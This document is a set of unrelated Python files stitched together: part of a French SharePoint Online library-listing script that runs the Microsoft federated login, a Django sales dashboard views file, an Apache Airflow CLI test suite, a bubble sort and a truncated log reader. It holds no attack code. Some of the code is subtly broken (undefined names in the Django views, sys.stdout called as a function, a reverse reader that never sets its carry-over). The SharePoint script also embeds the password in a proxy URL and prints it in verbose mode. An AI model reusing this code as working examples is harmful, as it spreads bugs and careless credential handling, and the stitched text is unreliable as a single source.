print rp.cookies
print rp.content
print '[',rep.status_code,']'
print ' -- headers --'
for hh in rep.headers:
print hh,'=',rep.headers[hh]
print ' -- cookies --'
for cc in rep.cookies:
print cc,'='
print ' - -url --'
print rep.url
return
def decode_folder(session,source,level,folder):
global g_cnt
try:
xml = lxml.etree.fromstring(source)
except:
sys.stdout('#')
sys.stdout.flush()
print source
nsmap = {'atom': 'http://www.w3.org/2005/Atom','d': 'http://schemas.microsoft.com/ado/2007/08/dataservices','m': 'http://schemas.microsoft.com/ado/2007/08/dataservices/metadata'}
cnt=0
for m in xml.xpath("//atom:entry/atom:content/m:properties", namespaces=nsmap):
cnt = cnt + 1
g_cnt = g_cnt + 1
N = m.find('d:Name', namespaces=nsmap)
L = m.find('d:ServerRelativeUrl', namespaces=nsmap)
I = m.find('d:ItemCount', namespaces=nsmap)
U = m.find('d:UniqueId', namespaces=nsmap)
rep = urllib.quote(L.text.encode('windows-1252'))
ligne = 'd;'+urllib.unquote(folder.encode("windows-1252"))+';"'+N.text.encode('windows-1252')+'";"'+args.site+rep+'";'+I.text+';'+U.text+';'+rep+'\n'
fo.write(ligne)
recurse_dir(session,rep,level)
return
def read_files(session,folder,level):
global g_file, g_size, flog
url = args.site + args.url +"_api/Web/GetFolderByServerRelativeUrl('"+folder+"')/files"
flog.write(url+'\n')
requete = session.get(url, proxies=p, verify=True,allow_redirects=True, headers = h, cookies = c)
xml = lxml.etree.fromstring(requete.content)
nsmap = {'atom': 'http://www.w3.org/2005/Atom','d': 'http://schemas.microsoft.com/ado/2007/08/dataservices','m': 'http://schemas.microsoft.com/ado/2007/08/dataservices/metadata'}
for m in xml.xpath("//atom:entry/atom:content/m:properties", namespaces=nsmap):
g_file = g_file + 1
N = m.find('d:Name', namespaces=nsmap)
# L = m.find('atom:id', namespaces=nsmap)
L = m.find('d:ServerRelativeUrl', namespaces=nsmap)
I = '1'
U = m.find('d:UniqueId', namespaces=nsmap)
rep = urllib.quote(L.text.encode('utf-8'))
z = m.find('d:Length', namespaces=nsmap)
ligne = 'f;'+urllib.unquote(folder)+';"'+N.text.encode('windows-1252')+'";"'+args.site+rep+'";'+I+';'+U.text+';'+rep+';'+z.text+'\n'
try:
g_size = g_size + int(z.text)
except:
sys.stdout.write('#')
fo.write(ligne)
sys.stdout.write('.')
sys.stdout.flush()
return
def recurse_dir(session,folder,level):
global fo
sys.stdout.write('+')
sys.stdout.flush()
level = level + 1
read_files(session,folder,level)
url = args.site + args.url +"_api/Web/GetFolderByServerRelativeUrl('"+folder+"')/folders"
flog.write(url+'\n')
try:
requete = session.get(url, proxies=p, verify=True,allow_redirects=True, headers = h, cookies = c)
except:
sys.stdout.write('#')
sys.stdout.flush()
print url
decode_folder(session,requete.content,level,folder)
level = level - 1
return level
def get_folder(session,folder):
global fo
name= folder+'.csv'
fo = open(name,'w')
fo.write('type;repertoire;nom;lien;id;qte;rel_url;taille\n')
print '--------------------------------------------------------------------------'
print '- lecture de repertoire / bibliotheque'
print ''
bibli = args.url+folder
level = recurse_dir(s,bibli,0)
print ''
print ''
print '- total de repertoires :',g_cnt
print '- total de fichiers :',g_file
print '- soit : ', g_cnt+g_file,'elements'
fo.close()
return
def get_token():
global s, p, h, c
print '--------------------------------------------------------------------------'
print '- Start login ...'
print '-'
u = args.site + args.url+ urllib.quote(args.bibliotheque)
if OUTSIDE :
p= ''
aff('NO PROXY : Outside mode enable.','')
if NTLM :
aff('NTLM : mode enable.','')
h = {'User-Agent' : 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11'}
h1 = { 'Connection' : 'keep-alive' , 'Upgrade-Insecure-Requests' : '1' , 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36' , 'Accept-Encoding' : 'gzip, deflate, sdch', 'Accept-Language' : 'fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4'}
h3 = { 'Accept' : 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With' : 'XMLHttpRequest' }
if VERBOSE : aff('First url to', args.site)
try:
r = s.get(u, proxies=p, verify = True,allow_redirects=True, headers= h1)
except:
return 0
if DEBUG : reponse(r,1)
if r.status_code == 404 : return 2
r2 = s.get(r.url, proxies=p, verify=True,allow_redirects=True, headers = h1 ) #, cookies = c)
if DEBUG : reponse(r2,2)
b = r2.content
tree = lxml.html.fromstring(b)
elements = tree.get_element_by_id('cred_hidden_inputs_container')
ctx = elements[0].value
flowtoken = elements[1].value
l = "https://login.microsoftonline.com/common/userrealm/?user="+args.email+"&api-version=2.1&stsRequest="+ctx+"&checkForMicrosoftAccount=true"
if VERBOSE :
aff('Get info from redirect to login.microsoftonline.com.','')
aff('CTX ->',ctx)
aff('Flowtoken ->',flowtoken)
aff('url : ',l)
aff('Get STS url from microsoft online (json response)','')
h1.update(h3)
c = {}
r3 = s.get(l, proxies=p, verify=True,allow_redirects=True , headers = h1 , cookies=c)
if DEBUG : reponse(r3,3)
#print r3.content
#-- debug
try:
j = json.loads(r3.content)
ad = j['AuthURL']+ "&popupui="
if VERBOSE : aff('URL OK in json reply.','')
except:
aff('URL ERREUR:',ad)
c = {}
if not NTLM :
if VERBOSE : aff('get SAML token','')
r4 = s.get(ad, proxies=p, verify=True,allow_redirects=True, headers = h, cookies = c)
else:
if VERBOSE : aff('get NTLM token','')
r4 = s.get(ad, proxies=p, verify=True,allow_redirects=True, auth = auth, headers = h, cookies = c)
if DEBUG: reponse(r4,4)
if not NTLM :
# connexion à partir du username/password : le même que le proxy
# on assume le fait que le Proxy et l'AD sont synchronisés et sont dans le même DOMAINE #
b = r4.content
tree = lxml.html.fromstring(b)
vs = tree.get_element_by_id("__VIEWSTATE").value #
ev = tree.get_element_by_id("__EVENTVALIDATION").value #
db = tree.xpath('//input/@value')[2]
# Peut etre ajouter le nom de domaine au username
data = '__VIEWSTATE='+urllib.quote(vs)+'&__EVENTVALIDATION='+urllib.quote(ev)+'&__db='+db+'&ctl00%24ContentPlaceHolder1%24UsernameTextBox='+urllib.quote(auth.username)+'&ctl00%24ContentPlaceHolder1%24PasswordTextBox='+urllib.quote(auth.password)+'&ctl00%24ContentPlaceHolder1%24SubmitButton=Connexion'
h1.update({'Content-Type' : 'application/x-www-form-urlencoded'})
if VERBOSE: aff('data : ', data)
p1 = s.post(ad, data = data, allow_redirects=True, cookies=c, headers = h1)
else:
p1 = s.post(r4.url, allow_redirects=True, auth=auth, cookies=c, headers = h1) # no data car NTLM
if VERBOSE : aff('POST Credentials to STS ','')
if not NTLM :
tree = lxml.html.fromstring(p1.content)
else:
tree = lxml.html.fromstring(r4.content)
wa = tree.xpath('//input/@value')[0]
wresult = tree.xpath('//input/@value')[1]
wctx = tree.xpath('//input/@value')[2]
data = 'wa='+wa+'&wresult='+urllib.quote(wresult)+'&wctx='+urllib.quote(wctx)
if VERBOSE :
aff('cookies : AUTH --------------->>>','')
aff('MSIAuth:',p1.cookies['MSISAuth'])
aff('Get SAML token to microsoft login.srf in order to get rtFa et FedAuth','')
mic="https://login.microsoftonline.com/login.srf"
if VERBOSE : print mic
p2 = s.post(mic, data = data, auth=auth, allow_redirects=True, headers = h1, cookies=c)
tree = lxml.html.fromstring(p2.content)
t = tree.xpath('//input/@value')[0]
data = 't='+urllib.quote(t)
if VERBOSE :
aff('SAML Token from Microsoft Online',data)
ad = args.site+'/_forms/default.aspx?apr=1&wa=wsignin1.0'
p3 = s.post(ad, data = data, allow_redirects=True, headers = h1, cookies=c)
if VERBOSE :
aff('Get rtFa & FedAuth session token to identify next requests','')
aff(p3.status_code, p3.history)
aff('rtFa =',p3.cookies['rtFa'])
aff('FedAuth =',p3.cookies['FedAuth'])
aff('Successfull Authentication','')
aff('-------------------------------------------------------------- <fin> -','')
return 1
def get_args():
global auth, p
global args
global DEBUG, OUTSIDE, VERBOSE, NTLM
parser = argparse.ArgumentParser()
parser = argparse.ArgumentParser(description='Liste les bibliotheques SharePoint dans un fichier csv')
parser.add_argument("bibliotheque",help="renseignez le nom de la bibliotheque")
parser.add_argument("-p","--proxy",default='proxy.my-org.local:8080',help="si vous etes derriere un proxy =1")
parser.add_argument("-e","--email",default='first.name@my-org.com',help="adresse mail")
parser.add_argument("-s","--site",default='https://my-org.sharepoint.com',help="adresse sharepoint du serveur -> ex: https://my.sharepoint.com")
parser.add_argument("-u","--url",default='/sites/team/',help="reference relative du site sharepoint : /sites/.../")
parser.add_argument("-d","--debug",default=False,action="store_true", help="=1 en mode DEBUG" )
parser.add_argument("-O","--Outside",default= False , action="store_true" ,help="par defaut NO Proxy")
parser.add_argument("-N","--NTLM",default= False , action="store_true" ,help="mettre l'option pour passer en mode NTLM")
parser.add_argument("-U","--username",default="eric",help="username")
parser.add_argument("-D","--Domaine",default="MYORG",help="Domaine de l'Active Directory")
parser.add_argument("-P","--Password",default="",help="password")
parser.add_argument("-v","--verbose",default=False,action="store_true",help="toutes les infos ...")
args = parser.parse_args()
Password = args.Password
if args.Password == "" :
Password = getpass.getpass(prompt="Entrez votre mot de passe Windows")
proxy = args.username+':'+Password+'@'+args.proxy
p={'http': 'http://'+proxy , 'https':'https://'+proxy}
auth = HttpNtlmAuth(args.Domaine+'\\'+args.username,Password)
OUTSIDE = args.Outside
NTLM = args.NTLM
DEBUG = args.debug
VERBOSE = args.verbose
if VERBOSE :
# print auth.username, auth.password
print '--------------------------------------------------------------------------'
aff('Arguments ...','')
aff('Username :',args.Domaine+'/'+args.username)
aff('eMail :',args.email)
aff('Site https :',args.site)
aff('proxy : ',proxy)
aff('Bibliotheques :',args.bibliotheque)
return
if __name__ == "__main__":
get_args()
s = requests.Session()
t0 = time.time()
token = get_token()
if token == 1 :
t1 = time.time()
get_folder(s,urllib.quote(args.bibliotheque))
tf=time.time()
print ''
print '- résolution authentication : {0:.2f} secondes'.format(t1-t0)
print '- scanning Bibliotheque en {0:.2f} secondes'.format(tf-t1)
print '- pour une taille de {0:.2f} Go'.format(g_size/1024.0/1024.0/1024.0)
print '- Perfomance : {0:.1f} ms/elements'.format( (tf-t1)/(g_cnt+g_file)*1000.0 )
print ''
print '-\n- by e-coucou 2015'
elif token == 2 :
print '404: file not found (bibliotheque, url)'
elif token == 0 :
print 'Erreur: invalid request (proxy, site)'
flog.close() |
from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect, JsonResponse
from .forms import Loginform,RowProduitsForm, RowClientsForm
from .models import Pumal, Clients, Produit, Wilaya
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from .filter import PumalFilter, ClientsFilter, NumberFilter
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.contrib.auth.models import User
from django.db.models import Count, Q, Sum, F
from django.views.generic import TemplateView
from django.db.models.functions import TruncMonth, ExtractMonth, Coalesce
import json
@login_required(login_url='Login')
def index(request):
#AllProduits = Pumal.objects.all().order_by('-id')
#context = {'AllProduits': AllProduits}
return render(request,"indexDASH.html")
@login_required(login_url='Login')
def index2(request):
AllProduits_list = Pumal.objects.all().order_by('-id')
myFilter = PumalFilter(request.GET, queryset=Pumal.objects.all())
AllProduits_list = myFilter.qs
paginator = Paginator(AllProduits_list, 5) # Show 2 clients per page
page_number = request.GET.get('page')
page_object = paginator.get_page(page_number)
context = {'AllProduits': AllProduits_list,
'myFilter': myFilter,
'page_object': page_object}
return render(request,"home3.html", context)
@login_required(login_url='Login')
def index3(request, page=1):
AllClients_list = Clients.objects.all().order_by('-id')
my_filter = ClientsFilter(request.GET, queryset=Clients.objects.all())
AllClients_list = my_filter.qs
paginator = Paginator(AllClients_list, 5) # Show 2 clients per page
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
context = {'AllClients': AllClients_list,
'myFilter': my_filter,
'page_obj': page_obj,
}
return render(request,"home4.html",context)
def pagelogin(request):
uservalue = ''
passwordvalue = ''
log_form = Loginform()
if request.method == "POST":
log_form = Loginform(request.POST or None)
if log_form.is_valid():
uservalue = log_form.cleaned_data.get("username")
passwordvalue = log_form.cleaned_data.get("password")
user = authenticate(username=uservalue, password=passwordvalue)
if user is not None:
login(request, user)
context = {'form': log_form,
'error': 'The login has been successful'}
return redirect('Revendeurs')
#return render(request, 'login.html', context)
else:
context = {'form': log_form,
'error': 'The username and password combination is incorrect'}
return render(request, 'login.html', context)
else:
context = {'form': log_form}
return render(request, 'login.html', context)
#def create_product(request):
#form = ProductForm(request.POST or None)
#if form.is_valid():
#form.save()
#form = ProductForm()
#context = {
# 'form': form
#}
#return render(request, "first.html", context)
@login_required(login_url='Login')
def create_product(request):
my_form = RowProductForm()
if request.method == "POST":
my_form = RowProductForm(request.POST or None)
if my_form.is_valid():
print(my_form.cleaned_data)
Products.objects.create(**my_form.cleaned_data )
my_form = RowProductForm()
context = {
'form': my_form
}
return render(request, "first.html", context)
def pagelogout(request):
if request.method == "POST":
logout(request)
return redirect('Login')
@login_required(login_url='Login')
def creer_produits(request):
mon_form = RowProduitsForm()
if request.method == "POST":
mon_form = RowProduitsForm(request.POST or None)
if mon_form.is_valid():
print(mon_form.cleaned_data)
Pumal.objects.create(**mon_form.cleaned_data )
mon_form = RowProduitsForm()
context = {
'form': mon_form,
}
return render(request, "first.html", context)
@login_required(login_url='Login')
def clients(request):
c_form = RowClientsForm()
if request.method == "POST":
c_form = RowClientsForm(request.POST or None)
if c_form.is_valid():
print(c_form.cleaned_data)
Clients.objects.create(**c_form.cleaned_data )
c_form = RowClientsForm()
context = {
'form': c_form
}
return render(request, "first.html", context)
def count_client(request):
count_all = Clients.objects.all().count()
count_ouest = Clients.objects.all().filter(région="1").count()
count_centre = Clients.objects.all().filter(région="2").count()
count_est = Clients.objects.all().filter(région="3").count()
produit_nom = Produit.objects.all()
#produit_count= Pumal.objects.all().filter(région="1",date__contains="09").aggregate(Sum('commande'))
mynumberFilter = NumberFilter(request.GET, queryset=Pumal.objects.all())
AllProduits_list = mynumberFilter.qs
produit_count = AllProduits_list.values('designation__nom').annotate(
ouest_commande=Coalesce(Sum('commande', filter=Q(région="1")), 0),
centre_commande=Coalesce(Sum('commande', filter=Q(région="2")), 0),
est_commande=Coalesce(Sum('commande', filter=Q(région="3")), 0)).order_by("-designation__nom")
produit_count2 = AllProduits_list.values('designation__nom').annotate(
ouest_commande=Coalesce(Sum('commande', filter=Q(région="1")), 0),
centre_commande=Coalesce(Sum('commande', filter=Q(région="2")), 0),
est_commande=Coalesce(Sum('commande', filter=Q(région="3")), 0),
month=TruncMonth('date')).order_by("-designation__nom")
context = {
'count_all':count_all,
'count_centre': count_centre,
'count_ouest': count_ouest,
'count_est': count_est,
'produit_nom': produit_nom,
'mynumberFilter': mynumberFilter,
'AllProduits_list' : AllProduits_list,
'produit_count': produit_count,
'produit_count2': produit_count2,
}
return render(request, 'number.html', context)
def homechart (request):
return render(request, 'count.html')
#def count_produits(request):
#produit_count= Pumal.objects.filter(designation="13" ,région="1",date__contains="11").aggregate(Total=Sum('commande')).annotate(month=ExtractMonth('date'))
#produit_count = Pumal.objects.values( 'région__nom','date','designation__nom').annotate(Total=Sum('commande'))
#produit_count = Pumal.objects.values('designation','région').annotate(Total=Sum('commande')).order_by('date')
#produit_count = Pumal.objects.filter(région= "1").annotate(month=TruncMonth('date')).values('month','designation__nom').annotate(Total=Sum('commande'))
#produit_count = Pumal.objects.filter( designation="1" ,commande=F(id))
#produit_count = Pumal.objects.all()
#produit_count1= Pumal.objects.values('designation__nom').filter(région= "3").annotate(total_commande1=Sum('commande')).order_by("région")
#produit_count2= Pumal.objects.values('designation__nom','région__nom').filter(région= "2").annotate(total_commande2=Sum('commande')).order_by("-designation__nom")
#produit_count3= Pumal.objects.values('designation__nom','région__nom').filter(région= "3").annotate(total_commande3=Sum('commande')).order_by("-designation__nom")
produit_count = Pumal.objects.values('designation__nom').annotate(ouest_commande=Coalesce(Sum('commande', filter= Q(région="1")),0),
centre_commande=Coalesce(Sum('commande', filter=Q(région="2")),0),
est_commande=Coalesce(Sum('commande', filter=Q(région="3" )),0) ).order_by("-designation__nom")
return render(request, 'count.html', {'produit_count': produit_count,
#'produit_count2': produit_count2,
#"'produit_count3': produit_count3,
#'produit_count':produit_count
})
#return JsonResponse (data={
#'categories': categories,
#'data': data,
#'series' :series,
#})
def load_wilaya(request):
région_id = request.GET.get('région_id')
cities = Wilaya.objects.filter(région_id=région_id).order_by('name')
return render(request, 'dropdown_list.html', {'cities': cities})
#print(list(wilaya.values('id','name')))
#return JsonResponse (list(wilaya.values('id','name')),safe=False)
|
#!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import argparse
import contextlib
import io
import os
import re
import subprocess
import sys
import timeit
from collections import Counter
from importlib import reload
from pathlib import Path
from unittest.mock import MagicMock, patch
import pytest
from airflow.cli import cli_config, cli_parser
from airflow.cli.cli_config import ActionCommand, core_commands, lazy_load_command
from airflow.cli.utils import CliConflictError
from airflow.configuration import AIRFLOW_HOME
from airflow.executors.local_executor import LocalExecutor
from tests.test_utils.config import conf_vars
# Can not be `--snake_case` or contain uppercase letter
ILLEGAL_LONG_OPTION_PATTERN = re.compile("^--[a-z]+_[a-z]+|^--.*[A-Z].*")
# Only can be `-[a-z]` or `-[A-Z]`
LEGAL_SHORT_OPTION_PATTERN = re.compile("^-[a-zA-z]$")
cli_args = {k: v for k, v in cli_parser.__dict__.items() if k.startswith("ARG_")}
class TestCli:
def test_arg_option_long_only(self):
"""
Test if the name of cli.args long option valid
"""
optional_long = [
arg for arg in cli_args.values() if len(arg.flags) == 1 and arg.flags[0].startswith("-")
]
for arg in optional_long:
assert ILLEGAL_LONG_OPTION_PATTERN.match(arg.flags[0]) is None, f"{arg.flags[0]} is not match"
def test_arg_option_mix_short_long(self):
"""
Test if the name of cli.args mix option (-s, --long) valid
"""
optional_mix = [
arg for arg in cli_args.values() if len(arg.flags) == 2 and arg.flags[0].startswith("-")
]
for arg in optional_mix:
assert LEGAL_SHORT_OPTION_PATTERN.match(arg.flags[0]) is not None, f"{arg.flags[0]} is not match"
assert ILLEGAL_LONG_OPTION_PATTERN.match(arg.flags[1]) is None, f"{arg.flags[1]} is not match"
def test_subcommand_conflict(self):
"""
Test if each of cli.*_COMMANDS without conflict subcommand
"""
subcommand = {
var: cli_parser.__dict__.get(var)
for var in cli_parser.__dict__
if var.isupper() and var.startswith("COMMANDS")
}
for group_name, sub in subcommand.items():
name = [command.name.lower() for command in sub]
assert len(name) == len(set(name)), f"Command group {group_name} have conflict subcommand"
def test_subcommand_arg_name_conflict(self):
"""
Test if each of cli.*_COMMANDS.arg name without conflict
"""
subcommand = {
var: cli_parser.__dict__.get(var)
for var in cli_parser.__dict__
if var.isupper() and var.startswith("COMMANDS")
}
for group, command in subcommand.items():
for com in command:
conflict_arg = [arg for arg, count in Counter(com.args).items() if count > 1]
assert (
[] == conflict_arg
), f"Command group {group} function {com.name} have conflict args name {conflict_arg}"
def test_subcommand_arg_flag_conflict(self):
"""
Test if each of cli.*_COMMANDS.arg flags without conflict
"""
subcommand = {
key: val
for key, val in cli_parser.__dict__.items()
if key.isupper() and key.startswith("COMMANDS")
}
for group, command in subcommand.items():
for com in command:
position = [
a.flags[0] for a in com.args if (len(a.flags) == 1 and not a.flags[0].startswith("-"))
]
conflict_position = [arg for arg, count in Counter(position).items() if count > 1]
assert [] == conflict_position, (
f"Command group {group} function {com.name} have conflict "
f"position flags {conflict_position}"
)
long_option = [
a.flags[0] for a in com.args if (len(a.flags) == 1 and a.flags[0].startswith("-"))
] + [a.flags[1] for a in com.args if len(a.flags) == 2]
conflict_long_option = [arg for arg, count in Counter(long_option).items() if count > 1]
assert [] == conflict_long_option, (
f"Command group {group} function {com.name} have conflict "
f"long option flags {conflict_long_option}"
)
short_option = [a.flags[0] for a in com.args if len(a.flags) == 2]
conflict_short_option = [arg for arg, count in Counter(short_option).items() if count > 1]
assert [] == conflict_short_option, (
f"Command group {group} function {com.name} have conflict "
f"short option flags {conflict_short_option}"
)
@patch.object(LocalExecutor, "get_cli_commands")
def test_dynamic_conflict_detection(self, cli_commands_mock: MagicMock):
core_commands.append(
ActionCommand(
name="test_command",
help="does nothing",
func=lambda: None,
args=[],
)
)
cli_commands_mock.return_value = [
ActionCommand(
name="test_command",
help="just a command that'll conflict with one defined in core",
func=lambda: None,
args=[],
)
]
with pytest.raises(CliConflictError, match="test_command"):
# force re-evaluation of cli commands (done in top level code)
reload(cli_parser)
def test_falsy_default_value(self):
arg = cli_config.Arg(("--test",), default=0, type=int)
parser = argparse.ArgumentParser()
arg.add_to_parser(parser)
args = parser.parse_args(["--test", "10"])
assert args.test == 10
args = parser.parse_args([])
assert args.test == 0
def test_commands_and_command_group_sections(self):
parser = cli_parser.get_parser()
with contextlib.redirect_stdout(io.StringIO()) as stdout:
with pytest.raises(SystemExit):
parser.parse_args(["--help"])
stdout = stdout.getvalue()
assert "Commands" in stdout
assert "Groups" in stdout
def test_dag_parser_commands_and_comamnd_group_sections(self):
parser = cli_parser.get_parser(dag_parser=True)
with contextlib.redirect_stdout(io.StringIO()) as stdout:
with pytest.raises(SystemExit):
parser.parse_args(["--help"])
stdout = stdout.getvalue()
assert "Commands" in stdout
assert "Groups" in stdout
def test_should_display_help(self):
parser = cli_parser.get_parser()
all_command_as_args = [
command_as_args
for top_command in cli_parser.airflow_commands
for command_as_args in (
[[top_command.name]]
if isinstance(top_command, cli_parser.ActionCommand)
else [[top_command.name, nested_command.name] for nested_command in top_command.subcommands]
)
]
for cmd_args in all_command_as_args:
with pytest.raises(SystemExit):
parser.parse_args([*cmd_args, "--help"])
def test_dag_cli_should_display_help(self):
parser = cli_parser.get_parser(dag_parser=True)
all_command_as_args = [
command_as_args
for top_command in cli_config.dag_cli_commands
for command_as_args in (
[[top_command.name]]
if isinstance(top_command, cli_parser.ActionCommand)
else [[top_command.name, nested_command.name] for nested_command in top_command.subcommands]
)
]
for cmd_args in all_command_as_args:
with pytest.raises(SystemExit):
parser.parse_args([*cmd_args, "--help"])
def test_positive_int(self):
assert 1 == cli_config.positive_int(allow_zero=True)("1")
assert 0 == cli_config.positive_int(allow_zero=True)("0")
with pytest.raises(argparse.ArgumentTypeError):
cli_config.positive_int(allow_zero=False)("0")
cli_config.positive_int(allow_zero=True)("-1")
@pytest.mark.parametrize(
"command",
[
"celery",
"kubernetes",
],
)
def test_executor_specific_commands_not_accessible(self, command):
with conf_vars({("core", "executor"): "SequentialExecutor"}), contextlib.redirect_stderr(
io.StringIO()
) as stderr:
reload(cli_parser)
parser = cli_parser.get_parser()
with pytest.raises(SystemExit):
parser.parse_args([command])
stderr = stderr.getvalue()
assert (f"airflow command error: argument GROUP_OR_COMMAND: invalid choice: '{command}'") in stderr
@pytest.mark.parametrize(
"executor,expected_args",
[
("CeleryExecutor", ["celery"]),
("CeleryKubernetesExecutor", ["celery", "kubernetes"]),
("KubernetesExecutor", ["kubernetes"]),
("LocalExecutor", []),
("LocalKubernetesExecutor", ["kubernetes"]),
("SequentialExecutor", []),
# custom executors are mapped to the regular ones in `conftest.py`
("custom_executor.CustomLocalExecutor", []),
("custom_executor.CustomLocalKubernetesExecutor", ["kubernetes"]),
("custom_executor.CustomCeleryExecutor", ["celery"]),
("custom_executor.CustomCeleryKubernetesExecutor", ["celery", "kubernetes"]),
("custom_executor.CustomKubernetesExecutor", ["kubernetes"]),
],
)
def test_cli_parser_executors(self, executor, expected_args):
"""Test that CLI commands for the configured executor are present"""
for expected_arg in expected_args:
with conf_vars({("core", "executor"): executor}), contextlib.redirect_stderr(
io.StringIO()
) as stderr:
reload(cli_parser)
parser = cli_parser.get_parser()
with pytest.raises(SystemExit) as e: # running the help command exits, so we prevent that
parser.parse_args([expected_arg, "--help"])
assert e.value.code == 0, stderr.getvalue() # return code 0 == no problem
stderr = stderr.getvalue()
assert "airflow command error" not in stderr
def test_non_existing_directory_raises_when_metavar_is_dir_for_db_export_cleaned(self):
"""Test that the error message is correct when the directory does not exist."""
with contextlib.redirect_stderr(io.StringIO()) as stderr:
with pytest.raises(SystemExit):
parser = cli_parser.get_parser()
parser.parse_args(["db", "export-archived", "--output-path", "/non/existing/directory"])
error_msg = stderr.getvalue()
assert error_msg == (
"\nairflow db export-archived command error: The directory "
"'/non/existing/directory' does not exist!, see help above.\n"
)
@pytest.mark.parametrize("export_format", ["json", "yaml", "unknown"])
@patch("airflow.cli.cli_config.os.path.isdir", return_value=True)
def test_invalid_choice_raises_for_export_format_in_db_export_archived_command(
self, mock_isdir, export_format
):
"""Test that invalid choice raises for export-format in db export-cleaned command."""
with contextlib.redirect_stderr(io.StringIO()) as stderr:
with pytest.raises(SystemExit):
parser = cli_parser.get_parser()
parser.parse_args(
["db", "export-archived", "--export-format", export_format, "--output-path", "mydir"]
)
error_msg = stderr.getvalue()
assert error_msg == (
"\nairflow db export-archived command error: argument "
f"--export-format: invalid choice: '{export_format}' "
"(choose from 'csv'), see help above.\n"
)
@pytest.mark.parametrize(
"action_cmd",
[
ActionCommand(name="name", help="help", func=lazy_load_command(""), args=(), hide=True),
ActionCommand(name="name", help="help", func=lazy_load_command(""), args=(), hide=False),
],
)
@patch("argparse._SubParsersAction")
def test_add_command_with_hide(self, mock_subparser_actions, action_cmd):
cli_parser._add_command(mock_subparser_actions, action_cmd)
if action_cmd.hide:
mock_subparser_actions.add_parser.assert_called_once_with(
action_cmd.name, epilog=action_cmd.epilog
)
else:
mock_subparser_actions.add_parser.assert_called_once_with(
action_cmd.name, help=action_cmd.help, description=action_cmd.help, epilog=action_cmd.epilog
)
# We need to run it from sources with PYTHONPATH, not command line tool,
# because we need to make sure that we have providers configured from source provider.yaml files
CONFIG_FILE = Path(AIRFLOW_HOME) / "airflow.cfg"
class TestCliSubprocess:
"""
We need to run it from sources using "__main__" and setting the PYTHONPATH, not command line tool,
because we need to make sure that we have providers loaded from source provider.yaml files rather
than from provider packages which might not be installed in the test environment.
"""
def test_cli_run_time(self):
setup_code = "import subprocess"
command = [sys.executable, "-m", "airflow", "--help"]
env = {"PYTHONPATH": os.pathsep.join(sys.path)}
timing_code = f"subprocess.run({command},env={env})"
# Limit the number of samples otherwise the test will take a very long time
num_samples = 3
threshold = 3.5
timing_result = timeit.timeit(stmt=timing_code, number=num_samples, setup=setup_code) / num_samples
# Average run time of Airflow CLI should at least be within 3.5s
assert timing_result < threshold
def test_cli_parsing_does_not_initialize_providers_manager(self):
"""Test that CLI parsing does not initialize providers manager.
This test is here to make sure that we do not initialize providers manager - it is run as a
separate subprocess, to make sure we do not have providers manager initialized in the main
process from other tests.
"""
CONFIG_FILE.parent.mkdir(parents=True, exist_ok=True)
CONFIG_FILE.touch(exist_ok=True)
result = subprocess.run(
[sys.executable, "-m", "airflow", "providers", "lazy-loaded"],
env={"PYTHONPATH": os.pathsep.join(sys.path)},
check=False,
text=True,
)
assert result.returncode == 0
def test_airflow_config_contains_providers(self):
"""Test that airflow config has providers included by default.
This test is run as a separate subprocess, to make sure we do not have providers manager
initialized in the main process from other tests.
"""
CONFIG_FILE.unlink(missing_ok=True)
result = subprocess.run(
[sys.executable, "-m", "airflow", "config", "list"],
env={"PYTHONPATH": os.pathsep.join(sys.path)},
check=False,
text=True,
)
assert result.returncode == 0
assert CONFIG_FILE.exists()
assert "celery_config_options" in CONFIG_FILE.read_text()
def test_airflow_config_output_contains_providers_by_default(self):
"""Test that airflow config has providers excluded in config list when asked for it."""
CONFIG_FILE.parent.mkdir(parents=True, exist_ok=True)
CONFIG_FILE.touch(exist_ok=True)
result = subprocess.run(
[sys.executable, "-m", "airflow", "config", "list"],
env={"PYTHONPATH": os.pathsep.join(sys.path)},
check=False,
text=True,
capture_output=True,
)
assert result.returncode == 0
assert "celery_config_options" in result.stdout
def test_airflow_config_output_does_not_contain_providers_when_excluded(self):
"""Test that airflow config has providers excluded in config list when asked for it."""
CONFIG_FILE.parent.mkdir(parents=True, exist_ok=True)
CONFIG_FILE.unlink(missing_ok=True)
CONFIG_FILE.touch(exist_ok=True)
result = subprocess.run(
[sys.executable, "-m", "airflow", "config", "list", "--exclude-providers"],
env={"PYTHONPATH": os.pathsep.join(sys.path)},
check=False,
text=True,
capture_output=True,
)
assert result.returncode == 0
assert "celery_config_options" not in result.stdout
|
def bubble_sort(arr: list) -> list:
arr = list(arr)
for j in range(len(arr)):
for j in range(len(arr)-1-j):
if arr[j] > arr[j+1]:
arr[j], arr[j + 1] = arr[j+1], arr[j]
return arr
|
import os
import re
from enum import Enum
class Status(Enum):
unknown = 1
up = 2
down = 3
def reverse_readline(filename, buffer_size=8196):
log = open(filename)
rest = None
log.seek(0, os.SEEK_END)
total_size = current_position = log.tell()
while current_position > 0:
read_size = buffer_size
if current_position < buffer_size:
read_size = current_position
current_position -= read_size
log.seek(current_position)
read_buffer = log.read(read_size)
lines = read_buffer.split('\n')
if rest is not None:
if read_buffer[-1] != '\n':
lines[-1] += rest
else:
yield rest
for line in lines[-1:0:-1]:
yield line
log.close()
def get_status(filename):
regex_ok = re.compile(r'(INFO|DEBUG|WARNING)')
regex_bad = re.compile(r'(ERROR|CRITICAL)')
